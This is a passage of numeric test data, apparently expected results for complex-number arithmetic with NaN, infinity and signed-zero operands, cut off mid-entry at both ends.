{complex(nan, inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(-zero, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(-zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(1, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(1, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(1, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-1, zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, 1), complex(-inf, inf)}, {complex(nan, -inf), complex(-1, -1), complex(inf, inf)}, {complex(nan, -inf), complex(-1, 2), complex(-inf, inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(2, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(2, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(2, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(inf, zero), complex(zero, zero), complex(inf, nan)}, {complex(inf, zero), complex(zero, -zero), complex(inf, nan)}, {complex(inf, zero), complex(zero, 1), complex(nan, -inf)}, {complex(inf, zero), complex(zero, -1), complex(nan, inf)}, {complex(inf, zero), complex(zero, 2), complex(nan, -inf)}, {complex(inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, zero), complex(zero, zero), complex(inf, nan)}, {complex(inf, zero), complex(-zero, -zero), complex(-inf, nan)}, {complex(inf, zero), complex(zero, 1), complex(nan, -inf)}, {complex(inf, zero), complex(-zero, -1), complex(nan, inf)}, {complex(inf, zero), complex(zero, 2), complex(nan, -inf)}, {complex(inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, zero), complex(1, zero), complex(inf, nan)}, {complex(inf, zero), complex(1, -zero), complex(inf, nan)}, {complex(inf, zero), complex(1, 1), complex(inf, -inf)}, {complex(inf, zero), complex(1, -1), complex(inf, inf)}, {complex(inf, zero), complex(1, 2), complex(inf, -inf)}, {complex(inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, zero), complex(-1, zero), complex(-inf, nan)}, {complex(inf, zero), complex(-1, -zero), complex(-inf, nan)}, {complex(inf, zero), complex(-1, 1), complex(-inf, -inf)}, {complex(inf, zero), complex(-1, -1), complex(-inf, inf)}, {complex(inf, zero), complex(-1, 2), complex(-inf, -inf)}, {complex(inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, zero), complex(2, zero), complex(inf, nan)}, {complex(inf, zero), complex(2, -zero), complex(inf, nan)}, {complex(inf, zero), complex(2, 1), complex(inf, -inf)}, {complex(inf, zero), complex(2, -1), complex(inf, inf)}, {complex(inf, zero), complex(2, 2), complex(inf, -inf)}, {complex(inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, zero), complex(nan, zero), complex(nan, nan)}, {complex(inf, zero), complex(nan, -zero), complex(nan, nan)}, {complex(inf, zero), complex(nan, 1), complex(nan, nan)}, {complex(inf, zero), complex(nan, -1), complex(nan, nan)}, {complex(inf, zero), complex(nan, 2), complex(nan, nan)}, {complex(inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, zero), complex(inf, zero), complex(nan, nan)}, {complex(inf, zero), complex(inf, -zero), complex(nan, nan)}, {complex(inf, zero), complex(inf, 1), complex(nan, nan)}, {complex(inf, zero), complex(inf, -1), complex(nan, nan)}, {complex(inf, zero), complex(inf, 2), complex(nan, nan)}, {complex(inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, zero), complex(-inf, zero), complex(nan, nan)}, {complex(inf, zero), complex(-inf, -zero), complex(nan, nan)}, {complex(inf, zero), complex(-inf, 1), complex(nan, nan)}, {complex(inf, zero), complex(-inf, -1), complex(nan, nan)}, {complex(inf, zero), complex(-inf, 2), complex(nan, nan)}, {complex(inf, zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -zero), complex(zero, zero), complex(inf, nan)}, {complex(inf, -zero), complex(zero, -zero), complex(inf, nan)}, {complex(inf, -zero), complex(zero, 1), complex(nan, -inf)}, {complex(inf, -zero), complex(zero, -1), complex(nan, inf)}, {complex(inf, -zero), complex(zero, 2), complex(nan, -inf)}, {complex(inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -zero), complex(zero, zero), complex(inf, nan)}, {complex(inf, -zero), complex(-zero, -zero), complex(-inf, nan)}, {complex(inf, -zero), complex(zero, 1), complex(nan, -inf)}, {complex(inf, -zero), complex(-zero, -1), complex(nan, inf)}, {complex(inf, -zero), complex(zero, 2), complex(nan, -inf)}, {complex(inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -zero), complex(1, zero), complex(inf, nan)}, {complex(inf, -zero), complex(1, -zero), complex(inf, nan)}, {complex(inf, -zero), complex(1, 1), complex(inf, -inf)}, {complex(inf, -zero), complex(1, -1), complex(inf, inf)}, {complex(inf, -zero), complex(1, 2), complex(inf, -inf)}, {complex(inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -zero), complex(-1, zero), complex(-inf, nan)}, {complex(inf, -zero), complex(-1, -zero), complex(-inf, nan)}, {complex(inf, -zero), complex(-1, 1), complex(-inf, -inf)}, {complex(inf, -zero), complex(-1, -1), complex(-inf, inf)}, {complex(inf, -zero), complex(-1, 2), complex(-inf, -inf)}, {complex(inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -zero), complex(2, zero), complex(inf, nan)}, {complex(inf, -zero), complex(2, -zero), complex(inf, nan)}, {complex(inf, -zero), complex(2, 1), complex(inf, -inf)}, {complex(inf, -zero), complex(2, -1), complex(inf, inf)}, {complex(inf, -zero), complex(2, 2), complex(inf, -inf)}, {complex(inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -zero), complex(nan, zero), complex(nan, nan)}, {complex(inf, -zero), complex(nan, -zero), complex(nan, nan)}, {complex(inf, -zero), complex(nan, 1), complex(nan, nan)}, {complex(inf, -zero), complex(nan, -1), complex(nan, nan)}, {complex(inf, -zero), complex(nan, 2), complex(nan, nan)}, {complex(inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -zero), complex(inf, zero), complex(nan, nan)}, {complex(inf, -zero), complex(inf, -zero), complex(nan, nan)}, {complex(inf, -zero), complex(inf, 1), complex(nan, nan)}, {complex(inf, -zero), complex(inf, -1), complex(nan, nan)}, {complex(inf, -zero), complex(inf, 2), complex(nan, nan)}, {complex(inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -zero), complex(-inf, zero), complex(nan, nan)}, {complex(inf, -zero), complex(-inf, -zero), complex(nan, nan)}, {complex(inf, -zero), complex(-inf, 1), complex(nan, nan)}, {complex(inf, -zero), complex(-inf, -1), complex(nan, nan)}, {complex(inf, -zero), complex(-inf, 2), complex(nan, nan)}, {complex(inf, -zero), complex(nan, nan), complex(nan, nan)}, {complex(inf, -zero), complex(nan, inf), complex(nan, nan)}, {complex(inf, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 1), complex(zero, zero), complex(inf, inf)}, {complex(inf, 1), complex(zero, -zero), complex(inf, inf)}, {complex(inf, 1), complex(zero, 1), complex(nan, -inf)}, {complex(inf, 1), complex(zero, -1), complex(nan, inf)}, {complex(inf, 1), complex(zero, 2), complex(nan, -inf)}, {complex(inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 1), complex(zero, zero), complex(inf, inf)}, {complex(inf, 1), complex(-zero, -zero), complex(-inf, -inf)}, {complex(inf, 1), complex(zero, 1), complex(nan, -inf)}, {complex(inf, 1), complex(-zero, -1), complex(nan, inf)}, {complex(inf, 1), complex(zero, 2), complex(nan, -inf)}, {complex(inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 1), complex(1, zero), complex(inf, nan)}, {complex(inf, 1), complex(1, -zero), complex(inf, nan)}, {complex(inf, 1), complex(1, 1), complex(inf, -inf)}, {complex(inf, 1), complex(1, -1), complex(inf, inf)}, {complex(inf, 1), complex(1, 2), complex(inf, -inf)}, {complex(inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 1), complex(-1, zero), complex(-inf, nan)}, {complex(inf, 1), complex(-1, -zero), complex(-inf, nan)}, {complex(inf, 1), complex(-1, 1), complex(-inf, -inf)}, {complex(inf, 1), complex(-1, -1), complex(-inf, inf)}, {complex(inf, 1), complex(-1, 2), complex(-inf, -inf)}, {complex(inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 1), complex(2, zero), complex(inf, nan)}, {complex(inf, 1), complex(2, -zero), complex(inf, nan)}, {complex(inf, 1), complex(2, 1), complex(inf, -inf)}, {complex(inf, 1), complex(2, -1), complex(inf, inf)}, {complex(inf, 1), complex(2, 2), complex(inf, -inf)}, {complex(inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 1), complex(nan, zero), complex(nan, nan)}, {complex(inf, 1), complex(nan, -zero), complex(nan, nan)}, {complex(inf, 1), complex(nan, 1), complex(nan, nan)}, {complex(inf, 1), complex(nan, -1), complex(nan, nan)}, {complex(inf, 1), complex(nan, 2), complex(nan, nan)}, {complex(inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 1), complex(inf, zero), complex(nan, nan)}, {complex(inf, 1), complex(inf, -zero), complex(nan, nan)}, {complex(inf, 1), complex(inf, 1), complex(nan, nan)}, {complex(inf, 1), complex(inf, -1), complex(nan, nan)}, {complex(inf, 1), complex(inf, 2), complex(nan, nan)}, {complex(inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 1), complex(-inf, zero), complex(nan, nan)}, {complex(inf, 1), complex(-inf, -zero), complex(nan, nan)}, {complex(inf, 1), complex(-inf, 1), complex(nan, nan)}, {complex(inf, 1), complex(-inf, -1), complex(nan, nan)}, {complex(inf, 1), complex(-inf, 2), complex(nan, nan)}, {complex(inf, 1), complex(nan, nan), complex(nan, nan)}, {complex(inf, 1), complex(nan, inf), complex(nan, nan)}, {complex(inf, 1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -1), complex(zero, zero), complex(inf, -inf)}, {complex(inf, -1), complex(zero, -zero), complex(inf, -inf)}, {complex(inf, -1), complex(zero, 1), complex(nan, -inf)}, {complex(inf, -1), complex(zero, -1), complex(nan, inf)}, {complex(inf, -1), complex(zero, 2), complex(nan, -inf)}, {complex(inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -1), complex(zero, zero), complex(inf, -inf)}, {complex(inf, -1), complex(-zero, -zero), complex(-inf, inf)}, {complex(inf, -1), complex(zero, 1), complex(nan, -inf)}, {complex(inf, -1), complex(-zero, -1), complex(nan, inf)}, {complex(inf, -1), complex(zero, 2), complex(nan, -inf)}, {complex(inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -1), complex(1, zero), complex(inf, nan)}, {complex(inf, -1), complex(1, -zero), complex(inf, nan)}, {complex(inf, -1), complex(1, 1), complex(inf, -inf)}, {complex(inf, -1), complex(1, -1), complex(inf, inf)}, {complex(inf, -1), complex(1, 2), complex(inf, -inf)}, {complex(inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -1), complex(-1, zero), complex(-inf, nan)}, {complex(inf, -1), complex(-1, -zero), complex(-inf, nan)}, {complex(inf, -1), complex(-1, 1), complex(-inf, -inf)}, {complex(inf, -1), complex(-1, -1), complex(-inf, inf)}, {complex(inf, -1), complex(-1, 2), complex(-inf, -inf)}, {complex(inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -1), complex(2, zero), complex(inf, nan)}, {complex(inf, -1), complex(2, -zero), complex(inf, nan)}, {complex(inf, -1), complex(2, 1), complex(inf, -inf)}, {complex(inf, -1), complex(2, -1), complex(inf, inf)}, {complex(inf, -1), complex(2, 2), complex(inf, -inf)}, {complex(inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -1), complex(nan, zero), complex(nan, nan)}, {complex(inf, -1), complex(nan, -zero), complex(nan, nan)}, {complex(inf, -1), complex(nan, 1), complex(nan, nan)}, {complex(inf, -1), complex(nan, -1), complex(nan, nan)}, {complex(inf, -1), complex(nan, 2), complex(nan, nan)}, {complex(inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -1), complex(inf, zero), complex(nan, nan)}, {complex(inf, -1), complex(inf, -zero), complex(nan, nan)}, {complex(inf, -1), complex(inf, 1), complex(nan, nan)}, {complex(inf, -1), complex(inf, -1), complex(nan, nan)}, {complex(inf, -1), complex(inf, 2), complex(nan, nan)}, {complex(inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, -1), complex(-inf, zero), complex(nan, nan)}, {complex(inf, -1), complex(-inf, -zero), complex(nan, nan)}, {complex(inf, -1), complex(-inf, 1), complex(nan, nan)}, {complex(inf, -1), complex(-inf, -1), complex(nan, nan)}, {complex(inf, -1), complex(-inf, 2), complex(nan, nan)}, {complex(inf, -1), complex(nan, nan), complex(nan, nan)}, {complex(inf, -1), complex(nan, inf), complex(nan, nan)}, {complex(inf, -1), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 2), complex(zero, zero), complex(inf, inf)}, {complex(inf, 2), complex(zero, -zero), complex(inf, inf)}, {complex(inf, 2), complex(zero, 1), complex(nan, -inf)}, {complex(inf, 2), complex(zero, -1), complex(nan, inf)}, {complex(inf, 2), complex(zero, 2), complex(nan, -inf)}, {complex(inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 2), complex(zero, zero), complex(inf, inf)}, {complex(inf, 2), complex(-zero, -zero), complex(-inf, -inf)}, {complex(inf, 2), complex(zero, 1), complex(nan, -inf)}, {complex(inf, 2), complex(-zero, -1), complex(nan, inf)}, {complex(inf, 2), complex(zero, 2), complex(nan, -inf)}, {complex(inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 2), complex(1, zero), complex(inf, nan)}, {complex(inf, 2), complex(1, -zero), complex(inf, nan)}, {complex(inf, 2), complex(1, 1), complex(inf, -inf)}, {complex(inf, 2), complex(1, -1), complex(inf, inf)}, {complex(inf, 2), complex(1, 2), complex(inf, -inf)}, {complex(inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 2), complex(-1, zero), complex(-inf, nan)}, {complex(inf, 2), complex(-1, -zero), complex(-inf, nan)}, {complex(inf, 2), complex(-1, 1), complex(-inf, -inf)}, {complex(inf, 2), complex(-1, -1), complex(-inf, inf)}, {complex(inf, 2), complex(-1, 2), complex(-inf, -inf)}, {complex(inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 2), complex(2, zero), complex(inf, nan)}, {complex(inf, 2), complex(2, -zero), complex(inf, nan)}, {complex(inf, 2), complex(2, 1), complex(inf, -inf)}, {complex(inf, 2), complex(2, -1), complex(inf, inf)}, {complex(inf, 2), complex(2, 2), complex(inf, -inf)}, {complex(inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 2), complex(nan, zero), complex(nan, nan)}, {complex(inf, 2), complex(nan, -zero), complex(nan, nan)}, {complex(inf, 2), complex(nan, 1), complex(nan, nan)}, {complex(inf, 2), complex(nan, -1), complex(nan, nan)}, {complex(inf, 2), complex(nan, 2), complex(nan, nan)}, {complex(inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 2), complex(inf, zero), complex(nan, nan)}, {complex(inf, 2), complex(inf, -zero), complex(nan, nan)}, {complex(inf, 2), complex(inf, 1), complex(nan, nan)}, {complex(inf, 2), complex(inf, -1), complex(nan, nan)}, {complex(inf, 2), complex(inf, 2), complex(nan, nan)}, {complex(inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(inf, 2), complex(-inf, zero), complex(nan, nan)}, {complex(inf, 2), complex(-inf, -zero), complex(nan, nan)}, {complex(inf, 2), complex(-inf, 1), complex(nan, nan)}, {complex(inf, 2), complex(-inf, -1), complex(nan, nan)}, {complex(inf, 2), complex(-inf, 2), complex(nan, nan)}, {complex(inf, 2), complex(nan, nan), complex(nan, nan)}, {complex(inf, 2), complex(nan, inf), complex(nan, nan)}, {complex(inf, 2), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(1, zero), complex(nan, nan)}, {complex(nan, nan), complex(1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(1, 1), complex(nan, nan)}, {complex(nan, nan), complex(1, -1), complex(nan, nan)}, {complex(nan, nan), complex(1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-1, zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, 1), complex(nan, nan)}, {complex(nan, nan), complex(-1, -1), complex(nan, nan)}, {complex(nan, nan), complex(-1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(2, zero), complex(nan, nan)}, {complex(nan, nan), complex(2, -zero), complex(nan, nan)}, {complex(nan, nan), complex(2, 1), complex(nan, nan)}, {complex(nan, nan), complex(2, -1), complex(nan, nan)}, {complex(nan, nan), complex(2, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, -zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, 1), complex(nan, nan)}, {complex(nan, nan), complex(nan, -1), complex(nan, nan)}, {complex(nan, nan), complex(nan, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, -zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(-zero, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(-zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(1, zero), complex(nan, inf)}, {complex(nan, inf), complex(1, -zero), complex(nan, inf)}, {complex(nan, inf), complex(1, 1), complex(inf, inf)}, {complex(nan, inf), complex(1, -1), complex(-inf, inf)}, {complex(nan, inf), complex(1, 